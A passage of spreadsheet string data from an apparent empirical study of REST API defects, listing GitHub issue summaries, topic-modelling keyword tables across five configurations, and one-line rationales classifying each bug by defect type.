    <t>In rest_validate_request_arg() we cannot use the `! is_bool()` conditional to validate if a request argument is either `true` or `false`. The query string in the url (example: https://demo.wp-api.org/wp-json/wp/v2/categories?hide_empty=true) will be parsed as a string. Which means you will always get the error: { code: "rest_invalid_param", message: "Invalid parameter(s): hide_empty", data: { status: 400, params: { hide_empty: "hide_empty is not of type boolean" } } }</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2730</t>
  </si>
  <si>
    <t>WP_REST_Attachment_Controller::update_item() is missing additional fields updates</t>
  </si>
  <si>
    <t>The update callback for the attachments endpoint is missing the additional fields updates.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2758</t>
  </si>
  <si>
    <t>Standardize the expected POST/PUT properties expected for schema nested objects</t>
  </si>
  <si>
    <t>In the [Posts Controller we accept POST/PUT values for `title` and `content` to be sent as `title.raw` or `content.raw`](https://github.com/WP-API/WP-API/blob/develop/lib/endpoints/class-wp-rest-posts-controller.php#L782). In this controller, we do NOT have a `santization_callback` set on the top-level `title` or `content` properties in the schema. The way the Comments Controller is setup prevents being able to pass `content.raw` to set the comment_content [because we DO have a sanitization_callback set on the top level `content` property](https://github.com/WP-API/WP-API/blob/develop/lib/endpoints/class-wp-rest-comments-controller.php#L867) in the schema. This means attempting to create or update a comment with `content.raw` set results in the following error: &gt; stripslashes() expects parameter 1 to be string, array given Some questions that need answering: 1. Do we want to limit the acceptable parameters for the nested objects? Examples: - only accept `content` and ignore `content.raw` values - only accept `content.raw` and ignore `content` values 2. Do we want to accept both top-level and `.raw` property values for the nested objects? 3. How can we modify the schema (if needed) to apply callbacks or required parameters to nested objects?</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2803</t>
  </si>
  <si>
    <t>/wp/v2/taxonomies object returns JSON array (not object) on invalid query</t>
  </si>
  <si>
    <t>`/wp/v2/taxonomies?type=wingding` will yield `[]`, when the default response for the endpoint is a keyed object. I presume that the object returned from the API should be consistently formed, so I raise whether we should return `{}` instead if an invalid type property is provided (or whether a descriptive error should be returned instead).</t>
  </si>
  <si>
    <t>https://github.com/Netflix/zuul/issues/13</t>
  </si>
  <si>
    <t>Change the default response code</t>
  </si>
  <si>
    <t>For requests processed by Zuul, the default response code is 200. Returning a 200 has the potential to mask issues with routing filter changes. Making the default response status a 500 will allow for finding issues earlier. When a request is proxied to a backend, the status code for the proxy action is set by Zuul based on the response from the backend. However if the filter is not a static response filter and the response never enters the route/proxy filter process an empty response is sent out by zuul with a 200. Changes need to be made to prevent it from happening.</t>
  </si>
  <si>
    <t>https://github.com/Netflix/zuul/issues/169</t>
  </si>
  <si>
    <t>setOriginContentLength in RequestContext fails for all files larger than 2.15 GB</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">setOriginContentLength in RequestContext uses Integer.parseInt to parse the content length. However, this will fail for any file larger than 2.15GB (max int is 2147483647). </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://github.com/Netflix/zuul/blob/1.x/zuul-core/src/main/java/com/netflix/zuul/context/RequestContext.java</t>
    </r>
  </si>
  <si>
    <t>Combining Topics Derived From Five Optimal Configurations</t>
  </si>
  <si>
    <t>topic id</t>
  </si>
  <si>
    <t>topic</t>
  </si>
  <si>
    <t>docs</t>
  </si>
  <si>
    <t>Defect Type</t>
  </si>
  <si>
    <t>#Defects</t>
  </si>
  <si>
    <t>Sub-Defect Type</t>
  </si>
  <si>
    <t>Config-180 Topic</t>
  </si>
  <si>
    <t>Config-344 Topic</t>
  </si>
  <si>
    <t>Config-517 Topic</t>
  </si>
  <si>
    <t>Config-519 Topic</t>
  </si>
  <si>
    <t>Config-583 Topic</t>
  </si>
  <si>
    <t>#Configs</t>
  </si>
  <si>
    <t>Top Keywords (Representative)</t>
  </si>
  <si>
    <t>Explanation</t>
  </si>
  <si>
    <t>0_containers_docker_container_true</t>
  </si>
  <si>
    <t>0_cap_containers_docker_container</t>
  </si>
  <si>
    <t>Configuration and Environment Issues</t>
  </si>
  <si>
    <t>Container and Resource Quota Handling Errors</t>
  </si>
  <si>
    <t>Topic 0</t>
  </si>
  <si>
    <t>containers, docker, linux, storage, conmon</t>
  </si>
  <si>
    <t>Failures in configuring or enforcing container limits and runtime settings.</t>
  </si>
  <si>
    <t>1_job_api_workflow_tower</t>
  </si>
  <si>
    <t>1_drone_server_github_dashboard</t>
  </si>
  <si>
    <t>1_ansible_job_api_inventory</t>
  </si>
  <si>
    <t>Job Execution and Workflow Configuration Defects</t>
  </si>
  <si>
    <t>Topic 1</t>
  </si>
  <si>
    <t>Topic 2</t>
  </si>
  <si>
    <t>job, api, workflow, tower, inventory, template</t>
  </si>
  <si>
    <t>Jobs or workflows fail due to incorrect API inputs or misconfigured templates.</t>
  </si>
  <si>
    <t>2_volume_volumes_http_content</t>
  </si>
  <si>
    <t>2_ansible_job_api_inventory</t>
  </si>
  <si>
    <t>2_filer_weed_volume_http</t>
  </si>
  <si>
    <t>2_filer_http_volume_content</t>
  </si>
  <si>
    <t>Environment-Specific Behavior and Configuration Bugs</t>
  </si>
  <si>
    <t>Topic 4</t>
  </si>
  <si>
    <t>Topic 5</t>
  </si>
  <si>
    <t>Topic 6</t>
  </si>
  <si>
    <t>environment, response, behavior, ref, reproduce</t>
  </si>
  <si>
    <t>API behavior changes or breaks under specific environments or configurations.</t>
  </si>
  <si>
    <t>3_post_parent_date_json</t>
  </si>
  <si>
    <t>3_post_schema_comment_parent</t>
  </si>
  <si>
    <t>3_schema_post_comment_parent</t>
  </si>
  <si>
    <t>3_filer_weed_volume_http</t>
  </si>
  <si>
    <t>3_index_type_channel_directory</t>
  </si>
  <si>
    <t>Data Validation and Query Processing Errors</t>
  </si>
  <si>
    <t>Schema and Payload Validation Errors in POST APIs</t>
  </si>
  <si>
    <t>Topic 3</t>
  </si>
  <si>
    <t>post, schema, json, comment, parent, title</t>
  </si>
  <si>
    <t>API requests are rejected due to malformed JSON, invalid fields, or schema violations.</t>
  </si>
  <si>
    <t>4_environment_response_behavior_ref</t>
  </si>
  <si>
    <t>4_filer_http_content_volume</t>
  </si>
  <si>
    <t>4_php_environment_response_behavior</t>
  </si>
  <si>
    <t>4_group_signal_mode_docker container</t>
  </si>
  <si>
    <t>Query Filter and Search Parameter Handling Errors</t>
  </si>
  <si>
    <t>Topic 10</t>
  </si>
  <si>
    <t>Topic 8</t>
  </si>
  <si>
    <t>Topic 9</t>
  </si>
  <si>
    <t>filter, search, query, dspace, flowable</t>
  </si>
  <si>
    <t>Query or search parameters are malformed, unsupported, or cause unexpected results.</t>
  </si>
  <si>
    <t>5_github_server_http_http server</t>
  </si>
  <si>
    <t>5_php_environment_response_behavior</t>
  </si>
  <si>
    <t>5_auth_authentication_endpoint_https</t>
  </si>
  <si>
    <t>5_post_json_raw_content</t>
  </si>
  <si>
    <t>5_query_post_rest_schema</t>
  </si>
  <si>
    <t>Authentication, Authorization, and Session Management Issues</t>
  </si>
  <si>
    <t>Authentication and Token Management Errors</t>
  </si>
  <si>
    <t>auth, token, login, authentication, dashboard</t>
  </si>
  <si>
    <t>User authentication or token-based access fails due to misconfigured endpoints.</t>
  </si>
  <si>
    <t>6_authentication_auth_endpoint_token</t>
  </si>
  <si>
    <t>6_group_signal_mode_docker container</t>
  </si>
  <si>
    <t>6_drone_github_servehttp_server</t>
  </si>
  <si>
    <t>6_environment_response_behavior_api</t>
  </si>
  <si>
    <t>Session, Token, and Account Lifecycle Management Errors</t>
  </si>
  <si>
    <t>dashboard, accounts, token, refresh, email</t>
  </si>
  <si>
    <t>Problems with login sessions, token refresh, or account-related workflows.</t>
  </si>
  <si>
    <t>7_signal_group_mode_docker container</t>
  </si>
  <si>
    <t>7_python_packages_self_local python</t>
  </si>
  <si>
    <t>7_github_server_sep_bash</t>
  </si>
  <si>
    <t>Integration, Middleware, and Runtime Environment Failures</t>
  </si>
  <si>
    <t>Middleware Integration Failures in REST APIs</t>
  </si>
  <si>
    <t>Topic 7</t>
  </si>
  <si>
    <t>github, server, middleware, servehttp, drone</t>
  </si>
  <si>
    <t>Failures during REST API interaction with CI tools, middleware, or web servers.</t>
  </si>
  <si>
    <t>8_node_database_table_anonymous</t>
  </si>
  <si>
    <t>8_filter_search_query_dspace</t>
  </si>
  <si>
    <t>8_query_filter_search_demo</t>
  </si>
  <si>
    <t>8_node_table_users rajuudava_rajuudava</t>
  </si>
  <si>
    <t>8_node_table_anonymous_database</t>
  </si>
  <si>
    <t>Process Signal and Grouping Issues in Containerized APIs</t>
  </si>
  <si>
    <t>signal, group, mode, docker container, cli</t>
  </si>
  <si>
    <t>Containerized services fail to handle process signals or groups correctly.</t>
  </si>
  <si>
    <t>9_python_self_packages_dist</t>
  </si>
  <si>
    <t>9_table_rajuudava packages_rajuudava_users rajuudava</t>
  </si>
  <si>
    <t>9_table_database_rajuudava_users rajuudava</t>
  </si>
  <si>
    <t>9_query_search_filter_dspace</t>
  </si>
  <si>
    <t>9_dashboard_accounts_duration_token</t>
  </si>
  <si>
    <t>Runtime and Dependency Errors</t>
  </si>
  <si>
    <t>python, packages, self, site, flask, dist</t>
  </si>
  <si>
    <t>APIs fail due to Python package, environment, or import-related issues.</t>
  </si>
  <si>
    <t>10_filter_search_query_dspace</t>
  </si>
  <si>
    <t>10_python_packages_local python_self</t>
  </si>
  <si>
    <t>Data Storage, Access, and Volume Errors</t>
  </si>
  <si>
    <t>Volume and File Upload/Access Errors</t>
  </si>
  <si>
    <t>volume, http, curl, content, dir, weed, filer</t>
  </si>
  <si>
    <t>File or volume operations fail due to missing paths, upload errors, or HTTP issues.</t>
  </si>
  <si>
    <t>11_index_netty_transform_type</t>
  </si>
  <si>
    <t>Database/Table User Access Handling Errors</t>
  </si>
  <si>
    <t>table, database, anonymous, mysql, users</t>
  </si>
  <si>
    <t>Users face access issues due to database permission errors or missing table configs.</t>
  </si>
  <si>
    <t>Distributed Systems and Clustering Failures</t>
  </si>
  <si>
    <t>Index and Cluster Coordination Failures</t>
  </si>
  <si>
    <t>Topic 11</t>
  </si>
  <si>
    <t>index, netty, transform, cluster</t>
  </si>
  <si>
    <t>Distributed systems fail due to index mismatches, sync issues, or type conflicts.</t>
  </si>
  <si>
    <t>Total Topics:</t>
  </si>
  <si>
    <t>Silhouette Score (excluding outliers):</t>
  </si>
  <si>
    <t>Topic Coherence (C_v):</t>
  </si>
  <si>
    <t xml:space="preserve">Topic Diversity: </t>
  </si>
  <si>
    <t>Topic 0: 0_containers_docker_container_true</t>
  </si>
  <si>
    <t>Topic 0: 0_cap_containers_docker_container</t>
  </si>
  <si>
    <t>Top words: containers, docker, container, true, false, storage, linux, package, host, path</t>
  </si>
  <si>
    <t>Top words: cap, containers, docker, container, true, false, linux, storage, slirp, conmon</t>
  </si>
  <si>
    <t>Top words: cap, containers, docker, container, true, api, false, storage, linux, package</t>
  </si>
  <si>
    <t>Top words: cap, containers, docker, container, true, false, linux, storage, type, package</t>
  </si>
  <si>
    <t>Top words: containers, docker, container, true, api, false, storage, linux, package, host</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>Topic 1: 1_job_api_workflow_tower</t>
  </si>
  <si>
    <t>Topic 1: 1_drone_server_github_dashboard</t>
  </si>
  <si>
    <t>Topic 1: 1_ansible_job_api_inventory</t>
  </si>
  <si>
    <t>Top words: job, api, workflow, tower, results, template, https, summary, type, launch</t>
  </si>
  <si>
    <t>Top words: drone, server, github, dashboard, token, volume, http, servehttp, auth, new</t>
  </si>
  <si>
    <t>Top words: ansible, job, api, inventory, workflow, tower, results, credential, template, https</t>
  </si>
  <si>
    <t>Top words: drone, server, github, dashboard, token, volume, http, servehttp, new, auth</t>
  </si>
  <si>
    <t>Top words: job, api, workflow, tower, results, template, summary, https, type, expected results</t>
  </si>
  <si>
    <t>Topic 2: 2_volume_volumes_http_content</t>
  </si>
  <si>
    <t>Topic 2: 2_ansible_job_api_inventory</t>
  </si>
  <si>
    <t>Topic 2: 2_filer_weed_volume_http</t>
  </si>
  <si>
    <t>Topic 2: 2_filer_http_volume_content</t>
  </si>
  <si>
    <t>Top words: volume, volumes, http, content, curl, dir, gmt, server, upload, length</t>
  </si>
  <si>
    <t>Top words: ansible, job, api, inventory, workflow, tower, credential, results, https, template</t>
  </si>
  <si>
    <t>Top words: filer, weed, volume, http, server, volumes, content, dir, curl, bucket</t>
  </si>
  <si>
    <t>Top words: ansible, job, api, inventory, workflow, tower, results, template, https, summary</t>
  </si>
  <si>
    <t>Top words: filer, http, volume, content, curl, gmt, weed, upload, dir, etag</t>
  </si>
  <si>
    <t>Topic 3: 3_post_parent_date_json</t>
  </si>
  <si>
    <t>Topic 3: 3_post_schema_comment_parent</t>
  </si>
  <si>
    <t>Topic 3: 3_schema_post_comment_parent</t>
  </si>
  <si>
    <t>Topic 3: 3_filer_weed_volume_http</t>
  </si>
  <si>
    <t>Topic 3: 3_index_type_channel_directory</t>
  </si>
  <si>
    <t>Top words: post, parent, date, json, schema, query, comment, content, variable, raw</t>
  </si>
  <si>
    <t>Top words: post, schema, comment, parent, rest, json, date, api, title, content</t>
  </si>
  <si>
    <t>Top words: schema, post, comment, parent, rest, json, date, title, fields, content</t>
  </si>
  <si>
    <t>Top words: filer, weed, volume, http, content, volumes, server, dir, curl, bucket</t>
  </si>
  <si>
    <t>Top words: index, type, channel, directory, cluster, enabled, live, text, enabled false, reason</t>
  </si>
  <si>
    <t>Topic 4: 4_environment_response_behavior_ref</t>
  </si>
  <si>
    <t>Topic 4: 4_filer_http_content_volume</t>
  </si>
  <si>
    <t>Topic 4: 4_php_environment_response_behavior</t>
  </si>
  <si>
    <t>Topic 4: 4_group_signal_mode_docker container</t>
  </si>
  <si>
    <t>Top words: environment, response, behavior, ref, api, attached, reproduce behavior, date, class, files</t>
  </si>
  <si>
    <t>Top words: filer, http, content, volume, weed, bucket, curl, server, gmt, dir</t>
  </si>
  <si>
    <t>Top words: php, environment, response, behavior, api, ref, response environment, attached, reproduce behavior, date</t>
  </si>
  <si>
    <t>Top words: php, environment, response, behavior, api, ref, response environment, files, attached, reproduce behavior</t>
  </si>
  <si>
    <t>Top words: group, signal, mode, docker container, number, signal cli, yes, json, container, cli</t>
  </si>
  <si>
    <t>Topic 5: 5_github_server_http_http server</t>
  </si>
  <si>
    <t>Topic 5: 5_php_environment_response_behavior</t>
  </si>
  <si>
    <t>Topic 5: 5_auth_authentication_endpoint_https</t>
  </si>
  <si>
    <t>Topic 5: 5_post_json_raw_content</t>
  </si>
  <si>
    <t>Topic 5: 5_query_post_rest_schema</t>
  </si>
  <si>
    <t>Top words: github, server, http, http server, middleware, web, gitlab, documents, func, local</t>
  </si>
  <si>
    <t>Top words: auth, authentication, endpoint, https, domain, authenticate, supported, login, springframework, token</t>
  </si>
  <si>
    <t>Top words: post, json, raw, content, title, date, post post, posts, data, schema</t>
  </si>
  <si>
    <t>Top words: query, post, rest, schema, date, api, title, variable, string, dspace</t>
  </si>
  <si>
    <t>Topic 6: 6_authentication_auth_endpoint_token</t>
  </si>
  <si>
    <t>Topic 6: 6_group_signal_mode_docker container</t>
  </si>
  <si>
    <t>Topic 6: 6_drone_github_servehttp_server</t>
  </si>
  <si>
    <t>Topic 6: 6_environment_response_behavior_api</t>
  </si>
  <si>
    <t>Top words: authentication, auth, endpoint, token, authenticate, domain, supported, https, admin, login</t>
  </si>
  <si>
    <t>Top words: group, signal, mode, docker container, yes, json, number, container, signal cli, groups</t>
  </si>
  <si>
    <t>Top words: drone, github, servehttp, server, drone drone, github drone, http, http server, drone server, sep</t>
  </si>
  <si>
    <t>Top words: group, signal, mode, docker container, number, yes, signal cli, json, cli, container</t>
  </si>
  <si>
    <t>Top words: environment, response, behavior, api, ref, null, attached, date, reproduce behavior, class</t>
  </si>
  <si>
    <t>Topic 7: 7_signal_group_mode_docker container</t>
  </si>
  <si>
    <t>Topic 7: 7_python_packages_self_local python</t>
  </si>
  <si>
    <t>Topic 7: 7_github_server_sep_bash</t>
  </si>
  <si>
    <t>Top words: signal, group, mode, docker container, yes, number, json, signal cli, rpc, groups</t>
  </si>
  <si>
    <t>Top words: python, packages, self, local python, local, site packages, python site, site, flask, packages flask</t>
  </si>
  <si>
    <t>Top words: signal, group, mode, docker container, yes, number, json, signal cli, json rpc, rpc</t>
  </si>
  <si>
    <t>Top words: python, packages, self, local python, local, python site, site packages, site, flask, packages flask</t>
  </si>
  <si>
    <t>Top words: github, server, sep, bash, http, http server, middleware, angular, gitlab, local</t>
  </si>
  <si>
    <t>Topic 8: 8_node_database_table_anonymous</t>
  </si>
  <si>
    <t>Topic 8: 8_filter_search_query_dspace</t>
  </si>
  <si>
    <t>Topic 8: 8_query_filter_search_demo</t>
  </si>
  <si>
    <t>Topic 8: 8_node_table_users rajuudava_rajuudava</t>
  </si>
  <si>
    <t>Topic 8: 8_node_table_anonymous_database</t>
  </si>
  <si>
    <t>Top words: node, database, table, anonymous, product, impl, mysql, users, project, user images</t>
  </si>
  <si>
    <t>Top words: filter, search, query, dspace, flowable, false, res, linked, condition, true</t>
  </si>
  <si>
    <t>Top words: query, filter, search, demo, https demo, https, key, dspace, results, url</t>
  </si>
  <si>
    <t>Top words: node, table, users rajuudava, rajuudava, rajuudava packages, database, anonymous, mysql, app node, users</t>
  </si>
  <si>
    <t>Top words: node, table, anonymous, database, product, mysql, users, images githubusercontent, user images, https user</t>
  </si>
  <si>
    <t>Topic 9: 9_python_self_packages_dist</t>
  </si>
  <si>
    <t>Topic 9: 9_table_rajuudava packages_rajuudava_users rajuudava</t>
  </si>
  <si>
    <t>Topic 9: 9_table_database_rajuudava_users rajuudava</t>
  </si>
  <si>
    <t>Topic 9: 9_query_search_filter_dspace</t>
  </si>
  <si>
    <t>Topic 9: 9_dashboard_accounts_duration_token</t>
  </si>
  <si>
    <t>Top words: python, self, packages, dist, dispatch, web, return, args, local, app</t>
  </si>
  <si>
    <t>Top words: table, rajuudava packages, rajuudava, users rajuudava, database, anonymous, node, mysql, users, https user</t>
  </si>
  <si>
    <t>Top words: table, database, rajuudava, users rajuudava, rajuudava packages, anonymous, product, node, mysql, region</t>
  </si>
  <si>
    <t>Top words: query, search, filter, dspace, results, api key, flowable, query results, false, result</t>
  </si>
  <si>
    <t>Top words: dashboard, accounts, duration, token, password, query, refresh, account, content, email</t>
  </si>
  <si>
    <t>Topic 10: 10_filter_search_query_dspace</t>
  </si>
  <si>
    <t>Topic 10: 10_python_packages_local python_self</t>
  </si>
  <si>
    <t>Top words: filter, search, query, dspace, flowable, res, linked, false, condition, true</t>
  </si>
  <si>
    <t>Top words: python, packages, local python, self, flask, packages flask, local, dispatch, python dist, dist packages</t>
  </si>
  <si>
    <t>Topic 11: 11_index_netty_transform_type</t>
  </si>
  <si>
    <t>Top words: index, netty, transform, type, netty channel, hydra, channel, live, indices, cluster</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>defect type</t>
  </si>
  <si>
    <t>rationale</t>
  </si>
  <si>
    <t>The issue is caused by unhandled HTTP exceptions and error conditions during REST API backend integration resulting in runtime failures.</t>
  </si>
  <si>
    <t>Annif fails when MauiServer returns malformed URIs in the API response payload indicating a lack of validation for response schema and field values.</t>
  </si>
  <si>
    <t>The limit query parameter is not correctly passed to the MauiServer resulting in an unexpected restriction on the number of suggestions returned.</t>
  </si>
  <si>
    <t>Issue is about handling redirect exceptions raised by the underlying Werkzeug middleware when routing requests without trailing slashes.</t>
  </si>
  <si>
    <t>Reading the request body hangs specifically under Python 3.5.2 indicating an environment-specific issue.</t>
  </si>
  <si>
    <t>Issue concerns handling invalid JSON or form content in request payloads which should trigger a 400 response.</t>
  </si>
  <si>
    <t>Setting CUSTOM_LOGO via the API appears to succeed but the uploaded image is not displayed at login indicating a failure in file upload or access handling through the API.</t>
  </si>
  <si>
    <t>Removing customized messages from a notification template causes a 500 error indicating a workflow misconfiguration in the API.</t>
  </si>
  <si>
    <t>The webhook notification integration intermittently fails to report all hosts indicating a problem in the REST API's interaction with the external webhook endpoint.</t>
  </si>
  <si>
    <t>The CLI and API reject valid dictionary-like input for the --inputs flag due to improper schema validation and type handling.</t>
  </si>
  <si>
    <t>API POST requests to workflow_job_template_nodes fail with 401 errors indicating authentication or token-based access is not working as expected.</t>
  </si>
  <si>
    <t>API fails to report the execution node when inventory updates are deployed to container groups due to environment-specific configuration.</t>
  </si>
  <si>
    <t>Jobs are dispatched to container groups even when Kubernetes ResourceQuota is exceeded causing immediate failures due to lack of quota enforcement.</t>
  </si>
  <si>
    <t>System Auditor user role is unable to view container groups due to insufficient access permissions.</t>
  </si>
  <si>
    <t>API returns a 500 error when creating a notification template with an invalid message format instead of properly validating the payload.</t>
  </si>
  <si>
    <t>Nested workflow jobs fail to start correctly when inventory is set via prompt on launch leading to stuck workflows and missing child jobs.</t>
  </si>
  <si>
    <t>Setting the base URL fails with error 400 specifically when using an internal DNS domain with a non-standard TLD indicating environment-specific configuration handling.</t>
  </si>
  <si>
    <t>The API rejects valid input for webhook_service because the default value is not included in the allowed choices causing schema validation to fail.</t>
  </si>
  <si>
    <t>Deleting an OAuth token using itself as the Bearer results in a 500 error indicating a problem in token lifecycle management.</t>
  </si>
  <si>
    <t>The API rejects a list-typed setting as a string due to improper payload type handling when modifying settings via the CLI.</t>
  </si>
  <si>
    <t>Normal users with correct permissions cannot create schedules via the API even though they can from the UI indicating a workflow configuration mismatch between API and UI.</t>
  </si>
  <si>
    <t>Workflow Job Template API endpoint does not provide credential type and kind information for webhook credentials leading to incomplete workflow configuration data.</t>
  </si>
  <si>
    <t>Authentication failure with bad credentials leads to a cryptic error message instead of a clear unauthorized response.</t>
  </si>
  <si>
    <t>Changing the items per page parameter on a paginated list leads to a 404 error indicating incorrect handling of query parameters for pagination.</t>
  </si>
  <si>
    <t>Nested hosts view for inventory group returns 404 in ui_next indicating a UI or API route not functioning in this specific environment version.</t>
  </si>
  <si>
    <t>Setting ask_variables_on_launch to true via API does not allow passing required variables at launch causing job execution to fail with undefined variable errors.</t>
  </si>
  <si>
    <t>The email notification incorrectly displays a null started field for the approval node despite the API providing the correct value indicating a workflow data mapping or configuration issue.</t>
  </si>
  <si>
    <t>API accepts invalid fields like id and name in POST request and fails to require mandatory fields such as source resulting in improper object creation.</t>
  </si>
  <si>
    <t>Custom virtualenvs configured in Kubernetes are not recognized by the API despite being present in the container filesystem.</t>
  </si>
  <si>
    <t>API returns a 400 error when saving a job template with inventory prompt enabled but no inventory selected indicating a schema or payload validation issue.</t>
  </si>
  <si>
    <t>Jobs fail to start after a fresh AWX install on CentOS 7 with Docker indicating an environment-specific configuration or setup issue.</t>
  </si>
  <si>
    <t>The API rejects the request with a 400 error and a message indicating an invalid role assignment due to schema or business rule violation.</t>
  </si>
  <si>
    <t>504 Gateway Timeout and upstream timed out errors in logs indicate failure in communication between web server and backend service.</t>
  </si>
  <si>
    <t>Issue occurs on a newly installed AWX using Docker on CentOS 7 and results in a 504 error when launching a job template indicating an environment or configuration-specific problem.</t>
  </si>
  <si>
    <t>504 timeouts on job_events API occur specifically when running long tasks in an OpenShift deployment of AWX.</t>
  </si>
  <si>
    <t>The logout button sends a GET instead of a POST request causing logout to fail and session to remain active.</t>
  </si>
  <si>
    <t>Refresh tokens do not expire as configured causing token lifecycle management to fail.</t>
  </si>
  <si>
    <t>API ignores the all_parents_must_converge field when creating a workflow node resulting in incorrect workflow configuration.</t>
  </si>
  <si>
    <t>AWX fails to retrieve a credential from Conjur due to incorrect URL encoding in the REST API integration.</t>
  </si>
  <si>
    <t>Unauthenticated GET request returns 500 instead of expected 401 indicating improper authentication error handling.</t>
  </si>
  <si>
    <t>Mattermost notification fails because the AWX REST API sends a multipart payload that Mattermost cannot decode resulting in a 400 error.</t>
  </si>
  <si>
    <t>The API accepts a PATCH with an invalid field modification for non-manual projects but does not return an error indicating improper schema validation.</t>
  </si>
  <si>
    <t>The API exports workflow job templates referencing inventories by numeric id instead of natural key causing incorrect associations when importing workflows between AWX/Tower instances.</t>
  </si>
  <si>
    <t>Changing the machine credential in a job template causes the API to reject the launch with a 400 error due to missing vault password requirements.</t>
  </si>
  <si>
    <t>Deleting a workflow approval via the API results in a 500 error due to a backend workflow handling issue after the approval step is completed.</t>
  </si>
  <si>
    <t>The schedule for a job template cannot be disabled via the API when its project or inventory is missing causing failed jobs to continue running.</t>
  </si>
  <si>
    <t>Workflow approval fails because the API endpoint for success_nodes does not exist in the workflow_approval_templates configuration.</t>
  </si>
  <si>
    <t>Delete action on inventory update job incorrectly targets the inventory endpoint instead of the update resource.</t>
  </si>
  <si>
    <t>API returns a 500 error when an unsupported query parameter modifier is used instead of a proper 4xx error.</t>
  </si>
  <si>
    <t>Advanced search by type fails with 400 because ExecutionEnvironment does not have a type field.</t>
  </si>
  <si>
    <t>The API returns an incorrectly formatted ansible_version field when ansible-core is installed due to changes in the ansible --version output specific to that environment.</t>
  </si>
  <si>
    <t>The paginator generates a request with an invalid page parameter value of 0 causing an unhandled 404 error.</t>
  </si>
  <si>
    <t>The module fails to correctly pass job tags to the API causing all tasks to execute instead of only those with the specified tags.</t>
  </si>
  <si>
    <t>Logout triggers unexpected config API requests resulting in 400 errors indicating a problem in the session termination workflow.</t>
  </si>
  <si>
    <t>API strings are not compiled and thus not translated in the UI due to missing build steps in the development environment configuration.</t>
  </si>
  <si>
    <t>Enabling Social Auth Organization and Team Mapping in a specific AWX configuration causes login failures and database errors that do not occur with default settings.</t>
  </si>
  <si>
    <t>API returns an error when filtering hosts using ansible_facts fields indicating unsupported or improperly handled query parameters.</t>
  </si>
  <si>
    <t>API allows modification of restricted fields in the controlplane group without proper validation resulting in unintended changes.</t>
  </si>
  <si>
    <t>The /api/v2/ping endpoint returns outdated "heartbeat" values due to changes in how instance health fields are mapped in newer platform versions.</t>
  </si>
  <si>
    <t>The API allows modification of hop node instance fields that should not be editable indicating missing or incorrect validation of PATCH/PUT payloads for these resources.</t>
  </si>
  <si>
    <t>Conjur Cloud requires a specific URL path structure that is not handled correctly by the plugin causing API requests to fail only in this environment.</t>
  </si>
  <si>
    <t>After upgrading AWX and with a specific LDAP organization map configuration the API incorrectly removes admin roles despite remove_admins being set to false.</t>
  </si>
  <si>
    <t>The plugin fails to authenticate with Conjur OSS due to a mismatch in the expected API endpoint structure resulting in a 401 Unauthorized error.</t>
  </si>
  <si>
    <t>API allows creation of a credential without the required webservice_id input leading to a runtime KeyError instead of validating or defaulting the field during payload processing.</t>
  </si>
  <si>
    <t>Only the first page of repositories is fetched because pagination parameters are not handled correctly in the API call.</t>
  </si>
  <si>
    <t>The API accepts treatment records with invalid ID formats indicating a lack of proper schema validation on POST requests.</t>
  </si>
  <si>
    <t>Alexa cannot access the Nightscout API when authentication roles are enabled even with a valid token in the endpoint URL.</t>
  </si>
  <si>
    <t>The crash is caused by the server not validating the presence of expected fields in the incoming WebSocket message payload.</t>
  </si>
  <si>
    <t>API v1/entries returns stale data only on NS version 15.0 and DEV branch indicating a behavior change under specific environment or configuration.</t>
  </si>
  <si>
    <t>Many POST endpoints do not validate the request body structure which leads to NullPointerExceptions when required JSON fields are missing.</t>
  </si>
  <si>
    <t>The server fails to enforce request size limits allowing memory exhaustion and CPU overload due to unbounded resource usage.</t>
  </si>
  <si>
    <t>The workflow fails with a 400 error because the required 'cron' parameter is missing in the configuration.</t>
  </si>
  <si>
    <t>Task log access fails with a 401 Unauthorized error when HTTP Basic Authentication is enforced through a proxy.</t>
  </si>
  <si>
    <t>The error is caused by a change in the Django REST Framework version which affects how serializer classes are handled in views.</t>
  </si>
  <si>
    <t>The set_username endpoint does not properly validate the username field because required validators are not added to the serializer field.</t>
  </si>
  <si>
    <t>Activation token becomes invalid after user login due to token generation logic tied to user session state.</t>
  </si>
  <si>
    <t>The issue arises because simultaneous POST requests bypass unique constraint validation leading to database IntegrityError and 500 response.</t>
  </si>
  <si>
    <t>The error occurs because the UserView class is missing a required queryset attribute or get_queryset method which is a runtime configuration issue in the API view.</t>
  </si>
  <si>
    <t>Non-administrative users receive a 403 error when attempting to access other users due to overly restrictive access control changes.</t>
  </si>
  <si>
    <t>The /auth/jwt/verify endpoint returns a 401 unauthorized error instead of the expected 400 indicating an issue with token verification handling.</t>
  </si>
  <si>
    <t>Serializer attempts to access a non-existent re_password field on the User model indicating a mismatch between the API payload schema and the model.</t>
  </si>
  <si>
    <t>User account deletion permissions and serializer settings are not respected causing incorrect handling of the account deletion workflow.</t>
  </si>
  <si>
    <t>The issue concerns incorrect user activation workflow after email update which is part of account lifecycle management.</t>
  </si>
  <si>
    <t>The /products/{id} REST API does not update the note_public and note_private fields indicating a failure to process or validate the payload for these properties.</t>
  </si>
  <si>
    <t>API response exposes internal database connection details in the returned JSON which is a security issue specific to the current environment and configuration.</t>
  </si>
  <si>
    <t>The API allows invalid or missing values for the 'ref' field when creating or updating a BOM which indicates improper validation of required fields in the payload.</t>
  </si>
  <si>
    <t>The API fails with internal server error when specific fields in the payload are set or linked incorrectly such as using objectId instead of MoLine and mishandling arraytoconsume and arraytoproduce.</t>
  </si>
  <si>
    <t>The API response schema changed in version 17 removing contract line date fields that were previously present in version 16.</t>
  </si>
  <si>
    <t>Serialization error occurs after upgrading Dolibarr PHP and PostgreSQL versions indicating the bug is triggered by specific environment changes.</t>
  </si>
  <si>
    <t>The API throws an exception when the endpoint is called without a SQL filter parameter due to an undefined variable.</t>
  </si>
  <si>
    <t>GET /multicurrencies endpoint fails to enforce proper authorization checks allowing unauthorized users to access currency data.</t>
  </si>
  <si>
    <t>API fails with a 500 error due to an undeclared property in PHP 8.1 environment which requires explicit variable declarations.</t>
  </si>
  <si>
